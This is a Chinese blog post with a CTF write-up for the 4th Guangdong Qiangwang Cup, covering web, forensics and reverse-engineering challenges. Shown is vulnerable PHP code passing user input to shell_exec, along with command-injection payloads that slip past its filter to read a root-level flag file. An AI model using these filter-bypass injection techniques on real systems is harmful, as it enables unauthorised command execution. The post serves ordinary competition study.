<!DOCTYPE html>
<html lang=en>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>第四届广东省强网杯 | chickenmushroom&#39;s blog</title>
  <meta name="description" content="第四届广东省强网杯WEBlove_Pokemon源码： 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152&lt;?phperror_reporting(0);highlight_file(__FILE__);$dir &#x3D; &amp;#x27;sandbox&#x2F;&amp;#x2">
<meta property="og:type" content="article">
<meta property="og:title" content="第四届广东省强网杯">
<meta property="og:url" content="http://example.com/2021/11/15/%E7%AC%AC%E5%9B%9B%E5%B1%8A%E5%B9%BF%E4%B8%9C%E7%9C%81%E5%BC%BA%E7%BD%91%E6%9D%AF/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="第四届广东省强网杯WEBlove_Pokemon源码： 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152&lt;?phperror_reporting(0);highlight_file(__FILE__);$dir &#x3D; &amp;#x27;sandbox&#x2F;&amp;#x2">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102091904669.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102092130920.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102092302704.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102092328094.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102092426077.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102092452939.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102092744570.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102093010913.png">
<meta property="article:published_time" content="2021-11-14T16:00:00.000Z">
<meta property="article:modified_time" content="2021-11-16T00:24:14.320Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="WriteUp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102091904669.png">
  <!-- Canonical links -->
  <link rel="canonical" href="http://example.com/2021/11/15/%E7%AC%AC%E5%9B%9B%E5%B1%8A%E5%B9%BF%E4%B8%9C%E7%9C%81%E5%BC%BA%E7%BD%91%E6%9D%AF/index.html">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 5.4.0"></head>


<body class="main-center" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/cofess" target="_blank">
          <img class="img-circle img-rotate" src="/images/avatar.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">chickenmushroom</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">Web</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> Guangzhou, China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="Search" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="Type something..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav ">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">Home</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">Archives</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">Categories</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags">
            
            <i class="icon icon-tags"></i>
            
            <span class="menu-title">Tags</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-repository">
          <a href="/repository">
            
            <i class="icon icon-project"></i>
            
            <span class="menu-title">Repository</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-books">
          <a href="/books">
            
            <i class="icon icon-book-fill"></i>
            
            <span class="menu-title">Books</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-links">
          <a href="/links">
            
            <i class="icon icon-friendship"></i>
            
            <span class="menu-title">Links</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-about">
          <a href="/about">
            
            <i class="icon icon-cup-fill"></i>
            
            <span class="menu-title">About</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="/null" target="_blank" title="Github" ><i class="icon icon-github"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Weibo" ><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Twitter" ><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Behance" ><i class="icon icon-behance"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" ><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">Board</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>欢迎交流与分享经验!</p>
            </div>
        </div>
    </div>
</div>

    
      

    
      
  <div class="widget">
    <h3 class="widget-title">Tags</h3>
    <div class="widget-body">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP%E5%B0%8F%E9%A1%B9%E7%9B%AE/" rel="tag">PHP小项目</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WriteUp/" rel="tag">WriteUp</a><span class="tag-list-count">6</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="tag">学习笔记</a><span class="tag-list-count">16</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget-body tagcloud">
      <a href="/tags/PHP%E5%B0%8F%E9%A1%B9%E7%9B%AE/" style="font-size: 13px;">PHP小项目</a> <a href="/tags/WriteUp/" style="font-size: 13.5px;">WriteUp</a> <a href="/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" style="font-size: 14px;">学习笔记</a>
    </div>
  </div>

    
      
  <div class="widget">
    <h3 class="widget-title">Archive</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/12/">December 2021</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/11/">November 2021</a><span class="archive-list-count">10</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/10/">October 2021</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/01/">January 2021</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/12/">December 2020</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/11/">November 2020</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/10/">October 2020</a><span class="archive-list-count">4</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/09/">September 2020</a><span class="archive-list-count">2</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled no-thumbnail">
        
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2021/12/04/%E5%8F%8D%E5%BC%B9Shell/" class="title">反弹shell</a>
              </p>
              <p class="item-date">
                <time datetime="2021-12-03T16:00:00.000Z" itemprop="datePublished">2021-12-04</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2021/11/15/ciscn2021%E5%8D%8A%E5%86%B3%E8%B5%9B%E5%8D%8E%E5%8D%97%E8%B5%9B%E5%8C%BA/" class="title">ciscn2021半决赛-华南赛区</a>
              </p>
              <p class="item-date">
                <time datetime="2021-11-14T16:00:00.000Z" itemprop="datePublished">2021-11-15</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2021/11/15/ciscn2021%E5%8D%8E%E5%8D%97%E8%B5%9B%E5%8C%BA%E9%A2%84%E8%B5%9B/" class="title">ciscn2021华南赛区预赛</a>
              </p>
              <p class="item-date">
                <time datetime="2021-11-14T16:00:00.000Z" itemprop="datePublished">2021-11-15</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2021/11/15/SQL%E6%B3%A8%E5%85%A5/" class="title">SQL注入总结</a>
              </p>
              <p class="item-date">
                <time datetime="2021-11-14T16:00:00.000Z" itemprop="datePublished">2021-11-15</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2021/11/15/docker%E5%85%A5%E9%97%A8%E5%88%B0%E9%83%A8%E7%BD%B2/" class="title">docker入门到部署</a>
              </p>
              <p class="item-date">
                <time datetime="2021-11-14T16:00:00.000Z" itemprop="datePublished">2021-11-15</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
<aside class="sidebar sidebar-toc collapse" id="collapseToc" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    <nav id="toc" class="article-toc">
      <h3 class="toc-title">Catalogue</h3>
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%AC%AC%E5%9B%9B%E5%B1%8A%E5%B9%BF%E4%B8%9C%E7%9C%81%E5%BC%BA%E7%BD%91%E6%9D%AF"><span class="toc-number">1.</span> <span class="toc-text">第四届广东省强网杯</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB"><span class="toc-number">1.1.</span> <span class="toc-text">WEB</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#love-Pokemon"><span class="toc-number">1.1.1.</span> <span class="toc-text">love_Pokemon</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MISC"><span class="toc-number">1.2.</span> <span class="toc-text">MISC</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AC%A2%E8%BF%8E%E5%8F%82%E5%8A%A0%E5%BC%BA%E7%BD%91%E6%9D%AF"><span class="toc-number">1.2.1.</span> <span class="toc-text">欢迎参加强网杯</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%84%E9%9C%B2%E7%9A%84%E7%A7%98%E5%AF%86"><span class="toc-number">1.2.2.</span> <span class="toc-text">泄露的秘密</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#memory1"><span class="toc-number">1.2.3.</span> <span class="toc-text">memory1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%82%AE%E4%BB%B6%E7%9A%84%E7%A7%98%E5%AF%86"><span class="toc-number">1.2.4.</span> <span class="toc-text">邮件的秘密</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RE"><span class="toc-number">1.3.</span> <span class="toc-text">RE</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#simplere"><span class="toc-number">1.3.1.</span> <span class="toc-text">simplere</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CRYPTO"><span class="toc-number">1.4.</span> <span class="toc-text">CRYPTO</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#RSA-and-BASE"><span class="toc-number">1.4.1.</span> <span class="toc-text">RSA and BASE?</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PWN"><span class="toc-number">1.5.</span> <span class="toc-text">PWN</span></a></li></ol></li></ol>
    </nav>
  </div>
</aside>

<main class="main" role="main">
  <div class="content">
  <article id="post-第四届广东省强网杯" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      第四届广东省强网杯
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2021/11/15/%E7%AC%AC%E5%9B%9B%E5%B1%8A%E5%B9%BF%E4%B8%9C%E7%9C%81%E5%BC%BA%E7%BD%91%E6%9D%AF/" class="article-date">
	  <time datetime="2021-11-14T16:00:00.000Z" itemprop="datePublished">2021-11-15</time>
	</a>
</span>
        
        
  <span class="article-tag">
    <i class="icon icon-tags"></i>
	<a class="article-tag-link-link" href="/tags/WriteUp/" rel="tag">WriteUp</a>
  </span>


        

        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2021/11/15/%E7%AC%AC%E5%9B%9B%E5%B1%8A%E5%B9%BF%E4%B8%9C%E7%9C%81%E5%BC%BA%E7%BD%91%E6%9D%AF/#comments" class="article-comment-link">Comments</a></span>
        
      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <h1 id="第四届广东省强网杯"><a href="#第四届广东省强网杯" class="headerlink" title="第四届广东省强网杯"></a>第四届广东省强网杯</h1><h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="love-Pokemon"><a href="#love-Pokemon" class="headerlink" title="love_Pokemon"></a>love_Pokemon</h3><p>源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$dir</span> = <span class="string">&#x27;sandbox/&#x27;</span> . md5(<span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>]) . <span class="string">&#x27;/&#x27;</span>;</span><br><span class="line"><span class="keyword">if</span>(!file_exists(<span class="variable">$dir</span>))&#123;</span><br><span class="line">mkdir(<span class="variable">$dir</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">DefenderBonus</span>(<span class="params"><span class="variable">$Pokemon</span></span>)</span>&#123;</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&quot;/&#x27;|</span></span><br><span class="line"><span class="string">|_|\\$|;|l|s|flag|a|t|m|r|e|j|k|n|w|i|\\\\|p|h|u|v|\\+|\\^|\`|\</span></span><br><span class="line"><span class="string">~|\||\&quot;|\&lt;|\&gt;|\=|&#123;|&#125;|\!|\&amp;|\*|\?|\(|\)/i&quot;</span>,<span class="variable">$Pokemon</span>))&#123;</span><br><span class="line"><span class="keyword">die</span>(<span class="string">&#x27;catch broken Pokemon! mew-_-two&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line"><span class="keyword">return</span> <span class="variable">$Pokemon</span>;</span><br><span class="line">??hint,payload</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">ghostpokemon</span>(<span class="params"><span class="variable">$Pokemon</span></span>)</span>&#123;</span><br><span class="line"><span class="keyword">if</span>(is_array(<span class="variable">$Pokemon</span>))&#123;</span><br><span class="line"><span class="keyword">foreach</span> (<span class="variable">$Pokemon</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$pks</span>) &#123;</span><br><span class="line"><span class="variable">$Pokemon</span>[<span class="variable">$key</span>] = DefenderBonus(<span class="variable">$pks</span>);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line"><span class="variable">$Pokemon</span> = DefenderBonus(<span class="variable">$Pokemon</span>);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">switch</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;myfavorite&#x27;</span>] ?? <span class="string">&quot;&quot;</span>)&#123;</span><br><span class="line"><span class="keyword">case</span> <span class="string">&#x27;picacu!&#x27;</span>:</span><br><span class="line"><span class="keyword">echo</span> md5(<span class="string">&#x27;picacu!&#x27;</span>).md5(<span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>]);</span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="string">&#x27;bulbasaur!&#x27;</span>:</span><br><span class="line"><span class="keyword">echo</span> md5(<span class="string">&#x27;miaowa!&#x27;</span>).md5(<span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>]);</span><br><span class="line"><span class="variable">$level</span> = <span class="variable">$_POST</span>[<span class="string">&quot;levelup&quot;</span>] ?? <span class="string">&quot;&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> ((!preg_match(<span class="string">&#x27;/lv100/i&#x27;</span>,<span class="variable">$level</span>)) &amp;&amp;</span><br><span class="line">(preg_match(<span class="string">&#x27;/lv100/i&#x27;</span>,escapeshellarg(<span class="variable">$level</span>))))&#123;</span><br><span class="line"><span class="keyword">echo</span> file_get_contents(<span class="string">&#x27;./hint.php&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="string">&#x27;squirtle&#x27;</span>:</span><br><span class="line"><span class="keyword">echo</span> md5(<span class="string">&#x27;jienijieni!&#x27;</span>).md5(<span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>]);</span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="string">&#x27;mewtwo&#x27;</span>:</span><br><span class="line"><span class="variable">$dream</span> = <span class="variable">$_POST</span>[<span class="string">&quot;dream&quot;</span>] ?? <span class="string">&quot;&quot;</span>;</span><br><span class="line"><span class="keyword">if</span>(strlen(<span class="variable">$dream</span>)&gt;=<span class="number">20</span>)&#123;</span><br><span class="line"><span class="keyword">die</span>(<span class="string">&quot;So Big Pokenmon!&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line">ghostpokemon(<span class="variable">$dream</span>);</span><br><span class="line"><span class="keyword">echo</span> shell_exec(<span class="variable">$dream</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<ul>
<li><p>获取hint，payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">myfavorite=bulbasaur!&amp;levelup=lv%fa100</span><br></pre></td></tr></table></figure>

</li>
</ul>
<p>得到提示，flag在根目录，文件名为FLAG</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$hint = &#x27;flag is located in / , and NAME IS FLAG&#x27;</span><br></pre></td></tr></table></figure>

<ul>
<li><p>读取FLAG测试还有多少字符能用</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">for</span> (<span class="variable">$ascii</span> = <span class="number">0</span>; <span class="variable">$ascii</span> &lt; <span class="number">256</span>; <span class="variable">$ascii</span>++) &#123;</span><br><span class="line"><span class="keyword">if</span> (!preg_match(<span class="string">&#x27;/\&#x27;|</span></span><br><span class="line"><span class="string">|_|\\$|;|l|s|flag|a|t|m|r|e|j|k|n|w|i|\\\\|p|h|u|v|\\+|\\^|\`|\</span></span><br><span class="line"><span class="string">~|\||\&quot;|\&lt;|\&gt;|\=|&#123;|&#125;|\!|\&amp;|\*|\?|\(|\)/i&#x27;</span>, chr(<span class="variable">$ascii</span>))) &#123;</span><br><span class="line"><span class="keyword">echo</span> (chr(<span class="variable">$ascii</span>));</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>可以得知能通过WAF的字符有下面这些：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">#%,-./0123456789:@BCDFGOQXYZ[]bcdfgoqxyz</span><br></pre></td></tr></table></figure>
</li>
<li><p>空格使用TAB代替即可，读取文件可以用od文件名用正则匹配，构造一下payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">myfavorite=mewtwo&amp;dream=od%09/F[C-Z][@-Z]G</span><br></pre></td></tr></table></figure>

<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102091904669.png" alt="image-20211102091904669"></p>
</li>
<li><p>十六进制转字符串即可获得flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;Php_Rc3_1s_V3Ry_C001_But_I_l0v3_Pokemon~&#125;</span><br></pre></td></tr></table></figure>



</li>
</ul>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="欢迎参加强网杯"><a href="#欢迎参加强网杯" class="headerlink" title="欢迎参加强网杯"></a>欢迎参加强网杯</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;Wec10m3_to_QwbCtF&#125;</span><br></pre></td></tr></table></figure>

<h3 id="泄露的秘密"><a href="#泄露的秘密" class="headerlink" title="泄露的秘密"></a>泄露的秘密</h3><p>用Tshark将http数据包导出来得到如下：</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102092130920.png" alt="image-20211102092130920"></p>
<p>都是盲注的payload，根据盲注结果，讲AIISC码转换为字符即可得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;Log_analysis_SQL&#125;</span><br></pre></td></tr></table></figure>

<h3 id="memory1"><a href="#memory1" class="headerlink" title="memory1"></a>memory1</h3><p>取证大师直接搜flag找到一个7z压缩包，压缩包有密码</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102092302704.png" alt="image-20211102092302704"></p>
<p>直接看进程，正好有个7z压缩程序</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102092328094.png" alt="image-20211102092328094"></p>
<p>直接导出来dump，Strings得到字符串，直接搜password，那么巧有一个叫password_is_complex</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102092426077.png" alt="image-20211102092426077"></p>
<p>但是压缩包密码不对，直接取证大师搜：</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102092452939.png" alt="image-20211102092452939"></p>
<p>密码是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">haha_password_is_complex</span><br></pre></td></tr></table></figure>

<p>解压直接得到flag</p>
<h3 id="邮件的秘密"><a href="#邮件的秘密" class="headerlink" title="邮件的秘密"></a>邮件的秘密</h3><p>这题基本解出来了，但是最后可能是outlook的问题，最后没解出来。没解出来就不放做题截图了。。。</p>
<p>这题就是用修复工具将邮件修复，修复之后打开附件有一张图片，最终就是flag</p>
<h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h2><h3 id="simplere"><a href="#simplere" class="headerlink" title="simplere"></a>simplere</h3><p>题目前半部分是迷宫题，根据wsad走就是前半部分的FLAG，后半部分是一个简单的异或</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">int main() &#123;</span><br><span class="line">char a[64] = &#123; 0x4D, 0x20, 0x7, 0x5, 0x43, 0x15, 0x7A,</span><br><span class="line">0x73, 0x39, 0x1, 0x7F, 0x53, 0x66, 0x4E,0x0D, 0x18, 0x60, 0x76,</span><br><span class="line">0x75, 0x0, 0x58, 0x15, 0x0, 0x32, 0x68, 0x3F, 0x78, 0x7F,0x7B,</span><br><span class="line">0x64, 0x4E, 0x49, 0x0F, 0x2E, 0x3F, 0x0D, 0x0D, 0x0D, 0x64,</span><br><span class="line">0x66, 0x61, 0x53,0x6, 0x44, 0x34, 0x6E, 0x69, 0x2F, 0x20, 0x14,</span><br><span class="line">0x37, 0x6A, 0x49, 0x55,0x36, 0x37,0x23, 0x23, 0x2A, 0x6B, 0x73,</span><br><span class="line">0x6, 0x78, 0x0B &#125;;</span><br><span class="line">char b[64] = &#123; 0x3E, 0x7A, 0x40, 0x64, 0x27, 0x25, 0x48,</span><br><span class="line">0x4, 0x4F, 0x63, 0x19, 0x60, 0x0B, 0x3A, 0x75, 0x5D, 0x11,</span><br><span class="line">0x4E, 0x7, 0x44, 0x30, 0x4C, 0x4B, 0x6, 0x5F, 0x73, 0x0D, 0x1A,</span><br><span class="line">0x38, 0x8, 0x34, 0x78, 0x45, 0x47, 0x58, 0x3B, 0x74, 0x7D,</span><br><span class="line">0x2C, 0x2B, 0x4A, 0x3C, 0x29, 0x13, 0x1, 0x3F, 0x3, 0x61, 0x70,</span><br><span class="line">0x52, 0x65, 0x9, 0x22, 0x0, 0x7F, 0x59, 0x6C, 0x77, 0x72, 0x3D,</span><br><span class="line">0x32, 0x55, 0x41, 0x49 &#125;;</span><br><span class="line">char out[64] = &#123;&#125;;</span><br><span class="line">for (int i=0; i&lt;64; i++) &#123;</span><br><span class="line">out[i] = a[i]^b[i];</span><br><span class="line">&#125;</span><br><span class="line">for (int i=0; i&lt;64; i++) &#123;</span><br><span class="line">printf(&quot;%c&quot;, out[i]);</span><br><span class="line">&#125;</span><br><span class="line">return 1;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>得到</p>
